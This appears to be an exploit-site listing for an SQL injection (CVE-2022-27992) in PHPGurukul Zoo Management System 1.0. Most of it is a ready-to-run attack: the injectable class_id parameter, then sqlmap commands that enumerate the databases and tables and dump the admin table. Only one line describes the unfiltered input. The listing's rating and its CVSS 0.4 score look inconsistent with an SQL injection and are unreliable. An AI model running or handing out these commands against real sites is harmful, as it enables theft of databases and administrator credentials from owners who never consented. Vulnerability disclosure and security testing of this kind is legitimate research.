Exploit for PHPGurukul Zoo Management System 1.0 SQL Injection CVE-2022-27992

Name: Exploit for PHPGurukul Zoo Management System 1.0 SQL Injection CVE-2022-27992
Rating: 5 (301 reviews)

2022-04-08 | CVSS 0.4

## https://sploitus.com/exploit?id=PACKETSTORM:166648
# Zoo Management System SQL Injection  
# Author: D4rkP0w4r   
* Description => sql injection at /animals?class_id=1  
* Injection Point  
  
http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1  
  
# Exploit   
* Exploit with Sqlmap  
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -dbs  
  
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -tables -D zoomanagement  
  
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -columns -D zoomanagement -T admin -dump  
  
# Vulnerable Code  
  
* No filter `class_id` when inserting data to database